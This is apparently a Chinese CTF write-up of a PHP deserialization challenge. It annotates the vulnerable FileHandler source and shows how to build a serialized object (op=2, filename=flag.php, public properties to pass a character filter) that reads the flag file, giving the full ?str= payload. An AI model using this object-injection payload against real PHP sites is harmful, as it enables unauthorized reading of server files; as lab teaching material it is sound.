源码及解释如下代码
<?php
include("flag.php");
highlight_file(__FILE__);
class FileHandler {
protected $op;
protected $filename;
protected $content;
function __construct() {
$op = "1";
$filename = "/tmp/tmpfile";
$content = "Hello World!";
$this->process();//表示接着要去访问process函数
}
public function process() {
if($this->op == "1") {
$this->write();//如果op=1,访问write函数
} else if($this->op == "2") {
$res = $this->read();
$this->output($res);//如果op=2,访问read函数并且输出
} else {
$this->output("Bad Hacker!");//否则,输出bad hacker
}
}
private function write() {
if(isset($this->filename) && isset($this->content)) {
if(strlen((string)$this->content) > 100) {
$this->output("Too long!");//如果filename及content不为空且content里字符串长度>100输出Too long
die();//接着结束进程,触发__destruct()函数
}
$res = file_put_contents($this->filename, $this->content);//将content里的内容写入filename中
if($res) $this->output("Successful!");
else $this->output("Failed!");
} else {
$this->output("Failed!");
}
}
private function read() {
$res = "";
if(isset($this->filename)) {
$res = file_get_contents($this->filename);//如果filename不为空,获取filename路径(暗示如果filename输入为flag.php,我们就能获取flag.php里的内容)
}
return $res;
}
private function output($s) {
echo "[Result]: <br>";
echo $s;
}
function __destruct() {
if($this->op === "2")
$this->op = "1";
$this->content = "";
$this->process();
}
}
function is_valid($s) {
for($i = 0; $i < strlen($s); $i++)
if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))//注意有个!非
return false;
return true;//形参变量i在ASCII码里为32-125则返回真
}
if(isset($_GET{'str'})) {
$str = (string)$_GET['str'];
if(is_valid($str)) {//调用is_valid函数判断是否满足在32-125范围
$obj = unserialize($str);
}
}
通过认真看代码及理解代码,根据op=2且filename=flag.php写出相应的反序列化代码构造payload即可得出flag。
<?php
highlight_file(__FILE__);
class FileHandler {
protected $op = 2;
protected $filename = "flag.php";
protected $content;
}
$a = new FileHandler();
$b = serialize($a);
echo $b
?>
但是发现这样会得到一些乱码
这是因为 protected/private类型的属性序列化后会产生不可打印字符,换成public类型就不会
<?php
highlight_file(__FILE__);
class FileHandler {
public $op = 2;
public $filename = "flag.php";
public $content;
}
$a = new FileHandler();
$b = serialize($a);
echo $b
?>
得到O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;}
构造?str=O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";N;}
接着ctrl+u查看源码即可得到flag